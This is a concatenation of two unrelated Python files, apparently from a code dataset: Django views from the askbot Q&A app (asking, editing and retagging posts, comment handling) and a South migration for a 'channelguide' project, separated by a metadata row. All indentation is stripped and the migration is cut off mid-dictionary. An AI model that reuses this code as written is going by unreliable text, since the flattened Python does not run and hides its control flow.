if request.user.is_anonymous() or (not request.user.is_administrator()):
if models.Post.objects.get_questions().exists():
raise Http404
if request.method == 'POST':
#if not request.is_ajax():
# raise Http404
form = forms.DumpUploadForm(request.POST, request.FILES)
if form.is_valid():
dump_file = form.cleaned_data['dump_file']
dump_storage = tempfile.NamedTemporaryFile()
#save the temp file
for chunk in dump_file.chunks():
dump_storage.write(chunk)
dump_storage.flush()
return HttpResponse(__import_se_data(dump_storage))
#yield HttpResponse(_('StackExchange import complete.'), content_type='text/plain')
#dump_storage.close()
else:
form = forms.DumpUploadForm()
data = {
'dump_upload_form': form,
'need_configuration': (not stackexchange.is_ready())
}
return render(request, 'import_data.html', data)
@fix_recaptcha_remote_ip
@csrf.csrf_protect
@decorators.check_authorization_to_post(ugettext_lazy('Please log in to make posts'))
@decorators.check_spam('text')
def ask(request):#view used to ask a new question
"""a view to ask a new question
    gives space for q title, body, tags and a checkbox to post as wiki
    user can start posting a question anonymously but then
    must login/register in order for the question to be shown
"""
if request.user.is_authenticated():
if request.user.is_read_only():
referer = request.META.get("HTTP_REFERER", reverse('questions'))
request.user.message_set.create(message=_('Sorry, but you have only read access'))
return HttpResponseRedirect(referer)
if askbot_settings.READ_ONLY_MODE_ENABLED:
return HttpResponseRedirect(reverse('index'))
if request.method == 'POST':
form = forms.AskForm(request.POST, user=request.user)
if form.is_valid():
timestamp = datetime.datetime.now()
title = form.cleaned_data['title']
wiki = form.cleaned_data['wiki']
tagnames = form.cleaned_data['tags']
text = form.cleaned_data['text']
ask_anonymously = form.cleaned_data['ask_anonymously']
post_privately = form.cleaned_data['post_privately']
group_id = form.cleaned_data.get('group_id', None)
language = form.cleaned_data.get('language', None)
if request.user.is_authenticated():
drafts = models.DraftQuestion.objects.filter(author=request.user)
drafts.delete()
user = form.get_post_user(request.user)
elif request.user.is_anonymous() and askbot_settings.ALLOW_ASK_UNREGISTERED:
user = models.get_or_create_anonymous_user()
ask_anonymously = True
else:
user = None
if user:
try:
question = user.post_question(
title=title,
body_text=text,
tags=tagnames,
wiki=wiki,
is_anonymous=ask_anonymously,
is_private=post_privately,
timestamp=timestamp,
group_id=group_id,
language=language,
ip_addr=request.META.get('REMOTE_ADDR')
)
signals.new_question_posted.send(None,
question=question,
user=user,
form_data=form.cleaned_data
)
return HttpResponseRedirect(question.get_absolute_url())
except exceptions.PermissionDenied, e:
request.user.message_set.create(message = unicode(e))
return HttpResponseRedirect(reverse('index'))
else:
request.session.flush()
session_key=request.session.session_key
models.AnonymousQuestion.objects.create(
session_key=session_key,
title=title,
tagnames=tagnames,
wiki=wiki,
is_anonymous=ask_anonymously,
text=text,
added_at=timestamp,
ip_addr=request.META.get('REMOTE_ADDR'),
)
return HttpResponseRedirect(url_utils.get_login_url())
if request.method == 'GET':
form = forms.AskForm(user=request.user)
draft_title = ''
draft_text = ''
draft_tagnames = ''
if request.user.is_authenticated():
drafts = models.DraftQuestion.objects.filter(author=request.user)
if len(drafts) > 0:
draft = drafts[0]
draft_title = draft.title
draft_text = draft.text
draft_tagnames = draft.tagnames
form.initial = {
'ask_anonymously': request.REQUEST.get('ask_anonymously', False),
'tags': request.REQUEST.get('tags', draft_tagnames),
'text': request.REQUEST.get('text', draft_text),
'title': request.REQUEST.get('title', draft_title),
'post_privately': request.REQUEST.get('post_privately', False),
'language': get_language(),
'wiki': request.REQUEST.get('wiki', False),
}
if 'group_id' in request.REQUEST:
try:
group_id = int(request.GET.get('group_id', None))
form.initial['group_id'] = group_id
except Exception:
pass
editor_is_folded = (askbot_settings.QUESTION_BODY_EDITOR_MODE=='folded' and \
askbot_settings.MIN_QUESTION_BODY_LENGTH==0 and \
form.initial['text'] == '')
data = {
'active_tab': 'ask',
'page_class': 'ask-page',
'form' : form,
'editor_is_folded': editor_is_folded,
'mandatory_tags': models.tag.get_mandatory_tags(),
'email_validation_faq_url':reverse('faq') + '#validate',
'category_tree_data': askbot_settings.CATEGORY_TREE,
'tag_names': list()#need to keep context in sync with edit_question for tag editor
}
data.update(context.get_for_tag_editor())
return render(request, 'ask.html', data)
@login_required
@csrf.csrf_protect
def retag_question(request, id):
"""retag question view
"""
question = get_object_or_404(models.Post, id=id)
try:
request.user.assert_can_retag_question(question)
if request.method == 'POST':
form = forms.RetagQuestionForm(question, request.POST)
if form.is_valid():
if form.has_changed():
request.user.retag_question(question=question, tags=form.cleaned_data['tags'])
if request.is_ajax():
response_data = {
'success': True,
'new_tags': question.thread.tagnames
}
if request.user.message_set.count() > 0:
#todo: here we will possibly junk messages
message = request.user.get_and_delete_messages()[-1]
response_data['message'] = message
data = simplejson.dumps(response_data)
return HttpResponse(data, content_type="application/json")
else:
return HttpResponseRedirect(question.get_absolute_url())
elif request.is_ajax():
response_data = {
'message': format_errors(form.errors['tags']),
'success': False
}
data = simplejson.dumps(response_data)
return HttpResponse(data, content_type="application/json")
else:
form = forms.RetagQuestionForm(question)
data = {
'active_tab': 'questions',
'question': question,
'form' : form,
}
return render(request, 'question_retag.html', data)
except exceptions.PermissionDenied, e:
if request.is_ajax():
response_data = {
'message': unicode(e),
'success': False
}
data = simplejson.dumps(response_data)
return HttpResponse(data, content_type="application/json")
else:
request.user.message_set.create(message = unicode(e))
return HttpResponseRedirect(question.get_absolute_url())
@login_required
@csrf.csrf_protect
@decorators.check_spam('text')
@fix_recaptcha_remote_ip
def edit_question(request, id):
"""edit question view
"""
question = get_object_or_404(models.Post, id=id)
if askbot_settings.READ_ONLY_MODE_ENABLED:
return HttpResponseRedirect(question.get_absolute_url())
try:
revision = question.revisions.get(revision=0)
except models.PostRevision.DoesNotExist:
revision = question.get_latest_revision()
revision_form = None
try:
request.user.assert_can_edit_question(question)
if request.method == 'POST':
if request.POST['select_revision'] == 'true':
#revert-type edit - user selected previous revision
revision_form = forms.RevisionForm(
question,
revision,
request.POST
)
if revision_form.is_valid():
# Replace with those from the selected revision
rev_id = revision_form.cleaned_data['revision']
revision = question.revisions.get(revision = rev_id)
form = forms.EditQuestionForm(
question=question,
user=request.user,
revision=revision
)
else:
form = forms.EditQuestionForm(
request.POST,
question=question,
user=question.user,
revision=revision
)
else:#new content edit
# Always check modifications against the latest revision
form = forms.EditQuestionForm(
request.POST,
question=question,
revision=revision,
user=request.user,
)
revision_form = forms.RevisionForm(question, revision)
if form.is_valid():
if form.has_changed():
if form.can_edit_anonymously() and form.cleaned_data['reveal_identity']:
question.thread.remove_author_anonymity()
question.is_anonymous = False
is_wiki = form.cleaned_data.get('wiki', question.wiki)
post_privately = form.cleaned_data['post_privately']
suppress_email = form.cleaned_data['suppress_email']
user = form.get_post_user(request.user)
user.edit_question(
question=question,
title=form.cleaned_data['title'],
body_text=form.cleaned_data['text'],
revision_comment=form.cleaned_data['summary'],
tags=form.cleaned_data['tags'],
wiki=is_wiki,
edit_anonymously=form.cleaned_data['edit_anonymously'],
is_private=post_privately,
suppress_email=suppress_email,
ip_addr=request.META.get('REMOTE_ADDR')
)
if 'language' in form.cleaned_data:
question.thread.set_language_code(form.cleaned_data['language'])
return HttpResponseRedirect(question.get_absolute_url())
else:
#request type was "GET"
revision_form = forms.RevisionForm(question, revision)
initial = {
'language': question.thread.language_code,
'post_privately': question.is_private(),
'wiki': question.wiki
}
form = forms.EditQuestionForm(
question=question,
revision=revision,
user=request.user,
initial=initial
)
data = {
'page_class': 'edit-question-page',
'active_tab': 'questions',
'question': question,
'revision': revision,
'revision_form': revision_form,
'mandatory_tags': models.tag.get_mandatory_tags(),
'form' : form,
'tag_names': question.thread.get_tag_names(),
'category_tree_data': askbot_settings.CATEGORY_TREE
}
data.update(context.get_for_tag_editor())
return render(request, 'question_edit.html', data)
except exceptions.PermissionDenied, e:
request.user.message_set.create(message = unicode(e))
return HttpResponseRedirect(question.get_absolute_url())
@login_required
@csrf.csrf_protect
@decorators.check_spam('text')
@fix_recaptcha_remote_ip
def edit_answer(request, id):
answer = get_object_or_404(models.Post, id=id)
if askbot_settings.READ_ONLY_MODE_ENABLED:
return HttpResponseRedirect(answer.get_absolute_url())
try:
revision = answer.revisions.get(revision=0)
except models.PostRevision.DoesNotExist:
revision = answer.get_latest_revision()
class_path = getattr(settings, 'ASKBOT_EDIT_ANSWER_FORM', None)
if class_path:
edit_answer_form_class = load_module(class_path)
else:
edit_answer_form_class = forms.EditAnswerForm
try:
request.user.assert_can_edit_answer(answer)
if request.method == "POST":
if request.POST['select_revision'] == 'true':
                # user has changed revision number
revision_form = forms.RevisionForm(
answer,
revision,
request.POST
)
if revision_form.is_valid():
# Replace with those from the selected revision
rev = revision_form.cleaned_data['revision']
revision = answer.revisions.get(revision = rev)
form = edit_answer_form_class(
answer, revision, user=request.user
)
else:
form = edit_answer_form_class(
answer,
revision,
request.POST,
user=request.user
)
else:
form = edit_answer_form_class(
answer, revision, request.POST, user=request.user
)
revision_form = forms.RevisionForm(answer, revision)
if form.is_valid():
if form.has_changed():
user = form.get_post_user(request.user)
suppress_email = form.cleaned_data['suppress_email']
is_private = form.cleaned_data.get('post_privately', False)
user.edit_answer(
answer=answer,
body_text=form.cleaned_data['text'],
revision_comment=form.cleaned_data['summary'],
wiki=form.cleaned_data.get('wiki', answer.wiki),
is_private=is_private,
suppress_email=suppress_email,
ip_addr=request.META.get('REMOTE_ADDR')
)
signals.answer_edited.send(None,
answer=answer,
user=user,
form_data=form.cleaned_data
)
return HttpResponseRedirect(answer.get_absolute_url())
else:
revision_form = forms.RevisionForm(answer, revision)
form = edit_answer_form_class(answer, revision, user=request.user)
if request.user.can_make_group_private_posts():
form.initial['post_privately'] = answer.is_private()
data = {
'page_class': 'edit-answer-page',
'active_tab': 'questions',
'answer': answer,
'revision': revision,
'revision_form': revision_form,
'form': form,
}
extra_context = context.get_extra(
'ASKBOT_EDIT_ANSWER_PAGE_EXTRA_CONTEXT',
request,
data
)
data.update(extra_context)
return render(request, 'answer_edit.html', data)
except exceptions.PermissionDenied, e:
request.user.message_set.create(message = unicode(e))
return HttpResponseRedirect(answer.get_absolute_url())
#todo: rename this function to post_new_answer
@decorators.check_authorization_to_post(ugettext_lazy('Please log in to make posts'))
@decorators.check_spam('text')
@fix_recaptcha_remote_ip
def answer(request, id, form_class=forms.AnswerForm):#process a new answer
"""view that posts new answer
anonymous users post into anonymous storage
    and are redirected to the login page
authenticated users post directly
"""
question = get_object_or_404(models.Post, post_type='question', id=id)
if askbot_settings.READ_ONLY_MODE_ENABLED:
return HttpResponseRedirect(question.get_absolute_url())
if request.method == "POST":
        #this check preserves backward compatibility
if form_class == forms.AnswerForm:
custom_class_path = getattr(settings, 'ASKBOT_NEW_ANSWER_FORM', None)
if custom_class_path:
form_class = load_module(custom_class_path)
else:
form_class = forms.AnswerForm
form = form_class(request.POST, user=request.user)
if form.is_valid():
if request.user.is_authenticated():
drafts = models.DraftAnswer.objects.filter(
author=request.user,
thread=question.thread
)
drafts.delete()
user = form.get_post_user(request.user)
try:
answer = form.save(
question,
user,
ip_addr=request.META.get('REMOTE_ADDR')
)
signals.new_answer_posted.send(None,
answer=answer,
user=user,
form_data=form.cleaned_data
)
return HttpResponseRedirect(answer.get_absolute_url())
except askbot_exceptions.AnswerAlreadyGiven, e:
request.user.message_set.create(message = unicode(e))
answer = question.thread.get_answers_by_user(user)[0]
return HttpResponseRedirect(answer.get_absolute_url())
except exceptions.PermissionDenied, e:
request.user.message_set.create(message = unicode(e))
else:
request.session.flush()
models.AnonymousAnswer.objects.create(
question=question,
wiki=form.cleaned_data['wiki'],
text=form.cleaned_data['text'],
session_key=request.session.session_key,
ip_addr=request.META.get('REMOTE_ADDR'),
)
return HttpResponseRedirect(url_utils.get_login_url())
return HttpResponseRedirect(question.get_absolute_url())
def __generate_comments_json(obj, user, avatar_size):
"""non-view generates json data for the post comments
"""
models.Post.objects.precache_comments(for_posts=[obj], visitor=user)
comments = obj._cached_comments
# {"Id":6,"PostId":38589,"CreationDate":"an hour ago","Text":"hello there!","UserDisplayName":"Jarrod Dixon","UserUrl":"/users/3/jarrod-dixon","DeleteUrl":null}
json_comments = []
for comment in comments:
if user and user.is_authenticated():
try:
user.assert_can_delete_comment(comment)
#/posts/392845/comments/219852/delete
#todo translate this url
is_deletable = True
except exceptions.PermissionDenied:
is_deletable = False
is_editable = template_filters.can_edit_comment(user, comment)
else:
is_deletable = False
is_editable = False
comment_owner = comment.author
tz = ' ' + template_filters.TIMEZONE_STR
comment_data = {'id' : comment.id,
'object_id': obj.id,
'comment_added_at': str(comment.added_at.replace(microsecond = 0)) + tz,
'html': comment.html,
'user_display_name': escape(comment_owner.username),
'user_profile_url': comment_owner.get_profile_url(),
'user_avatar_url': comment_owner.get_avatar_url(avatar_size),
'user_id': comment_owner.id,
'user_is_administrator': comment_owner.is_administrator(),
'user_is_moderator': comment_owner.is_moderator(),
'is_deletable': is_deletable,
'is_editable': is_editable,
'points': comment.points,
'score': comment.points, #to support js
'upvoted_by_user': getattr(comment, 'upvoted_by_user', False)
}
json_comments.append(comment_data)
data = simplejson.dumps(json_comments)
return HttpResponse(data, content_type="application/json")
@csrf.csrf_protect
@decorators.check_spam('comment')
def post_comments(request):#generic ajax handler to load comments to an object
"""todo: fixme: post_comments is ambigous:
means either get comments for post or
add a new comment to post
"""
# only support get post comments by ajax now
post_type = request.REQUEST.get('post_type', '')
if not request.is_ajax() or post_type not in ('question', 'answer'):
raise Http404 # TODO: Shouldn't be 404! More like 400, 403 or sth more specific
if post_type == 'question' \
and askbot_settings.QUESTION_COMMENTS_ENABLED == False:
raise Http404
elif post_type == 'answer' \
and askbot_settings.ANSWER_COMMENTS_ENABLED == False:
raise Http404
user = request.user
if request.method == 'POST':
form = forms.NewCommentForm(request.POST)
elif request.method == 'GET':
form = forms.GetCommentDataForPostForm(request.GET)
if form.is_valid() == False:
return HttpResponseBadRequest(
_('This content is forbidden'),
mimetype='application/json'
)
post_id = form.cleaned_data['post_id']
avatar_size = form.cleaned_data['avatar_size']
try:
post = models.Post.objects.get(id=post_id)
except models.Post.DoesNotExist:
return HttpResponseBadRequest(
_('Post not found'), mimetype='application/json'
)
if request.method == "GET":
response = __generate_comments_json(post, user, avatar_size)
elif request.method == "POST":
try:
if user.is_anonymous():
msg = _('Sorry, you appear to be logged out and '
'cannot post comments. Please '
'<a href="%(sign_in_url)s">sign in</a>.') % \
{'sign_in_url': url_utils.get_login_url()}
raise exceptions.PermissionDenied(msg)
if askbot_settings.READ_ONLY_MODE_ENABLED:
raise exceptions.PermissionDenied(askbot_settings.READ_ONLY_MESSAGE)
comment = user.post_comment(
parent_post=post,
body_text=form.cleaned_data['comment'],
ip_addr=request.META.get('REMOTE_ADDR')
)
signals.new_comment_posted.send(None,
comment=comment,
user=user,
form_data=form.cleaned_data
)
response = __generate_comments_json(post, user, avatar_size)
except exceptions.PermissionDenied, e:
response = HttpResponseForbidden(unicode(e), content_type="application/json")
return response
@csrf.csrf_protect
@decorators.ajax_only
#@decorators.check_spam('comment')
def edit_comment(request):
if request.user.is_anonymous():
raise exceptions.PermissionDenied(_('Sorry, anonymous users cannot edit comments'))
if askbot_settings.READ_ONLY_MODE_ENABLED:
raise exceptions.PermissionDenied(askbot_settings.READ_ONLY_MESSAGE)
form = forms.EditCommentForm(request.POST)
if form.is_valid() == False:
raise exceptions.PermissionDenied('This content is forbidden')
comment_post = models.Post.objects.get(
post_type='comment',
id=form.cleaned_data['comment_id']
)
revision = request.user.edit_comment(
comment_post=comment_post,
body_text=form.cleaned_data['comment'],
suppress_email=form.cleaned_data['suppress_email'],
ip_addr=request.META.get('REMOTE_ADDR'),
)
is_deletable = template_filters.can_delete_comment(
comment_post.author, comment_post)
is_editable = template_filters.can_edit_comment(
comment_post.author, comment_post)
    tz = ' ' + template_filters.TIMEZONE_STR
timestamp = str(comment_post.added_at.replace(microsecond=0)) + tz
    #need this because post.text comes from the latest approved
    #revision, but we may need the suggested revision
comment_post.text = revision.text
comment_post.html = comment_post.parse_post_text()['html']
return {
'id' : comment_post.id,
'object_id': comment_post.parent.id,
'comment_added_at': timestamp,
'html': comment_post.html,
'user_display_name': escape(comment_post.author.username),
'user_url': comment_post.author.get_profile_url(),
'user_id': comment_post.author.id,
'is_deletable': is_deletable,
'is_editable': is_editable,
'score': comment_post.points, #to support unchanged js
'points': comment_post.points,
'voted': comment_post.is_upvoted_by(request.user),
}
@csrf.csrf_protect
def delete_comment(request):
"""ajax handler to delete comment
"""
try:
if request.user.is_anonymous():
msg = _('Sorry, you appear to be logged out and '
'cannot delete comments. Please '
'<a href="%(sign_in_url)s">sign in</a>.') % \
{'sign_in_url': url_utils.get_login_url()}
raise exceptions.PermissionDenied(msg)
if request.is_ajax():
form = forms.ProcessCommentForm(request.POST)
if form.is_valid() == False:
return HttpResponseBadRequest()
comment_id = form.cleaned_data['comment_id']
comment = get_object_or_404(models.Post, post_type='comment', id=comment_id)
request.user.assert_can_delete_comment(comment)
if askbot_settings.READ_ONLY_MODE_ENABLED:
raise exceptions.PermissionDenied(askbot_settings.READ_ONLY_MESSAGE)
parent = comment.parent
comment.delete()
#attn: recalc denormalized field
parent.comment_count = parent.comments.count()
parent.save()
parent.thread.reset_cached_data()
avatar_size = form.cleaned_data['avatar_size']
return __generate_comments_json(parent, request.user, avatar_size)
raise exceptions.PermissionDenied(
_('sorry, we seem to have some technical difficulties')
)
except exceptions.PermissionDenied, e:
return HttpResponseForbidden(
unicode(e),
mimetype = 'application/json'
)
@login_required
@decorators.post_only
@csrf.csrf_protect
def comment_to_answer(request):
if request.user.is_anonymous():
msg = _('Sorry, only logged in users can convert comments to answers. '
'Please <a href="%(sign_in_url)s">sign in</a>.') % \
{'sign_in_url': url_utils.get_login_url()}
raise exceptions.PermissionDenied(msg)
form = forms.ConvertCommentForm(request.POST)
if form.is_valid() == False:
raise Http404
comment = get_object_or_404(
models.Post,
post_type='comment',
id=form.cleaned_data['comment_id']
)
if askbot_settings.READ_ONLY_MODE_ENABLED is False:
request.user.repost_comment_as_answer(comment)
return HttpResponseRedirect(comment.get_absolute_url())
@decorators.post_only
@csrf.csrf_protect
#todo: change the urls config for this
def repost_answer_as_comment(request, destination=None):
assert(
destination in (
'comment_under_question',
'comment_under_previous_answer'
)
)
if request.user.is_anonymous():
msg = _('Sorry, only logged in users can convert answers to comments. '
'Please <a href="%(sign_in_url)s">sign in</a>.') % \
{'sign_in_url': url_utils.get_login_url()}
raise exceptions.PermissionDenied(msg)
answer_id = request.POST.get('answer_id')
if answer_id:
try:
answer_id = int(answer_id)
except (ValueError, TypeError):
raise Http404
answer = get_object_or_404(models.Post,
post_type = 'answer', id=answer_id)
if askbot_settings.READ_ONLY_MODE_ENABLED:
return HttpResponseRedirect(answer.get_absolute_url())
request.user.assert_can_convert_post(post=answer)
if destination == 'comment_under_question':
destination_post = answer.thread._question_post()
else:
#comment_under_previous_answer
destination_post = answer.get_previous_answer(user=request.user)
#todo: implement for comment under other answer
if destination_post is None:
message = _('Error - could not find the destination post')
request.user.message_set.create(message=message)
return HttpResponseRedirect(answer.get_absolute_url())
if len(answer.text) <= askbot_settings.MAX_COMMENT_LENGTH:
answer.post_type = 'comment'
answer.parent = destination_post
new_comment_count = answer.comments.count() + 1
answer.comment_count = 0
answer_comments = models.Post.objects.get_comments().filter(parent=answer)
answer_comments.update(parent=destination_post)
#why this and not just "save"?
answer.parse_and_save(author=answer.author)
answer.thread.update_answer_count()
answer.parent.comment_count += new_comment_count
answer.parent.save()
answer.thread.reset_cached_data()
else:
message = _(
'Cannot convert, because text has more characters than '
'%(max_chars)s - maximum allowed for comments'
) % {'max_chars': askbot_settings.MAX_COMMENT_LENGTH}
request.user.message_set.create(message=message)
return HttpResponseRedirect(answer.get_absolute_url())
else:
raise Http404
| gpl-3.0 | -7,389,069,209,881,651,000 | 38.794769 | 184 | 0.566008 | false |
kmshi/miroguide | channelguide/channels/migrations/0003_switch_user_ids.py | 1 | 13086 |
from south.db import db
from django.db import models
from channelguide.channels.models import *
class Migration:
no_dry_run = True
def forwards(self, orm):
"Write your forwards migration here"
for channel in orm.Channel.objects.all():
for field in ('owner', 'featured_by', 'moderator_shared_by',
'last_moderated_by'):
value = getattr(channel, '%s_id' % field)
if value:
profile = orm['user_profile.UserProfile'].objects.get(
pk=value)
setattr(channel, field, profile.user)
else:
setattr(channel, field, None)
channel.save()
def backwards(self, orm):
"Write your backwards migration here"
models = {
'auth.group': {
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'blank': 'True'})
},
'auth.permission': {
'Meta': {'unique_together': "(('content_type', 'codename'),)"},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'user_profile.userprofile': {
'Meta': {'db_table': "'user'"},
'age': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'approved': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'blocked': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'channel_owner_emails': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'city': ('django.db.models.fields.CharField', [], {'max_length': '45'}),
'country': ('django.db.models.fields.CharField', [], {'max_length': '25'}),
'created_at': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '100'}),
'email_updates': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'filter_languages': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'fname': ('django.db.models.fields.CharField', [], {'max_length': '45'}),
'gender': ('django.db.models.fields.CharField', [], {'max_length': '1'}),
'hashed_password': ('django.db.models.fields.CharField', [], {'max_length': '40'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'im_type': ('django.db.models.fields.CharField', [], {'max_length': '25'}),
'im_username': ('django.db.models.fields.CharField', [], {'max_length': '35'}),
'language': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '5'}),
'lname': ('django.db.models.fields.CharField', [], {'max_length': '45'}),
'moderator_board_email': ('django.db.models.fields.CharField', [], {'default': "'S'", 'max_length': '1'}),
'role': ('django.db.models.fields.CharField', [], {'default': "'U'", 'max_length': '1'}),
'show_explicit': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'shown_languages': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['labels.Language']"}),
'state': ('django.db.models.fields.CharField', [], {'max_length': '20'}),
'status_emails': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'updated_at': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']", 'to_field': "'username'", 'unique': 'True', 'db_column': "'username'"}),
'zip': ('django.db.models.fields.CharField', [], {'max_length': '15'})
},
'auth.user': {
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'channels.addedchannel': {
'Meta': {'unique_together': "[('channel', 'user')]", 'db_table': "'cg_channel_added'"},
'channel': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'added_channels'", 'to': "orm['channels.Channel']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'timestamp': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'added_channels'", 'to': "orm['auth.User']"})
},
'channels.channel': {
'Meta': {'db_table': "'cg_channel'"},
'adult': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'approved_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'archived': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'categories': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['labels.Category']"}),
'creation_time': ('django.db.models.fields.DateTimeField', [], {'auto_now_add': 'True', 'blank': 'True'}),
'description': ('django.db.models.fields.TextField', [], {}),
'featured': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'featured_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'featured_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'featured_set'", 'null': 'True', 'to': "orm['auth.User']"}),
'feed_etag': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'feed_modified': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'geoip': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '100'}),
'hi_def': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'language': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'channels'", 'db_column': "'primary_language_id'", 'to': "orm['labels.Language']"}),
'last_moderated_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'last_moderated_set'", 'null': 'True', 'to': "orm['auth.User']"}),
'license': ('django.db.models.fields.CharField', [], {'default': "''", 'max_length': '40'}),
'moderator_shared_at': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'moderator_shared_by': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'moderator_shared_set'", 'null': 'True', 'to': "orm['auth.User']"}),
'modified': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'channels'", 'to': "orm['auth.User']"}),
'postal_code': ('django.db.models.fields.CharField', [], {'max_length': '15'}),
'publisher': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'state': ('django.db.models.fields.CharField', [], {'default': "'N'", 'max_length': '1'}),
'tags': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['labels.Tag']"}),
'thumbnail_extension': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '8', 'null': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'waiting_for_reply_date': ('django.db.models.fields.DateTimeField', [], {'null': 'True', 'blank': 'True'}),
'was_featured': ('django.db.models.fields.BooleanField', [], {'default': 'False', 'blank': 'True'}),
'website_url': ('django.db.models.fields.URLField', [], {'max_length': '255'})
},
'channels.item': {
'Meta': {'db_table': "'cg_channel_item'"},
'channel': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'items'", 'to': "orm['channels.Channel']"}),
'date': ('django.db.models.fields.DateTimeField', [], {}),
'description': ('django.db.models.fields.TextField', [], {}),
'guid': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'mime_type': ('django.db.models.fields.CharField', [], {'max_length': '50'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'size': ('django.db.models.fields.IntegerField', [], {}),
'thumbnail_extension': ('django.db.models.fields.CharField', [], {'default': 'None', 'max_length': '8', 'null': 'True'}),
'thumbnail_url': ('django.db.models.fields.CharField', [], {'max_length': '255', 'null': 'True', 'blank': 'True'}),
'url': ('django.db.models.fields.URLField', [], {'max_length': '255'})
},
'channels.lastapproved': {
'Meta': {'db_table': "'cg_channel_last_approved'"},
'timestamp': ('django.db.models.fields.DateTimeField', [], {'primary_key': 'True'})
},
'contenttypes.contenttype': {
'Meta': {'unique_together': "(('app_label', 'model'),)", 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'labels.category': {
'Meta': {'db_table': "'cg_category'"},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'}),
'on_frontpage': ('django.db.models.fields.BooleanField', [], {'default': 'True', 'blank': 'True'})
},
'labels.language': {
'Meta': {'db_table': "'cg_channel_language'"},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '200'})
},
